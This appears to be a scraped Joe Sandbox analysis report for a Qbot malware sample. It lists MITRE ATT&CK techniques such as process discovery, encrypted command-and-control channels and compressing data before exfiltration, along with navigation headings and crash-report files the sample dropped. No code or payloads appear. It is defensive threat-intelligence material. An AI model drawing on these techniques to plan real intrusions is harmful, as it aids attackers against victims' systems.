Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 050_qbot.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Qbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1d45f7cb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1d5df7cb\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_419b281e7a1c62a2cfa3b86aa4ad63773747ea5_82810a17_1e260587\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_f72750b22a9214184114f6be25e810eecaece948_82810a17_1e060623\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER171.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CF.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER77.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA7.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBA8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC44.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD10.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD6E.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD6F.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD9E.tmp.xml

Windows Analysis Report
050_qbot.dll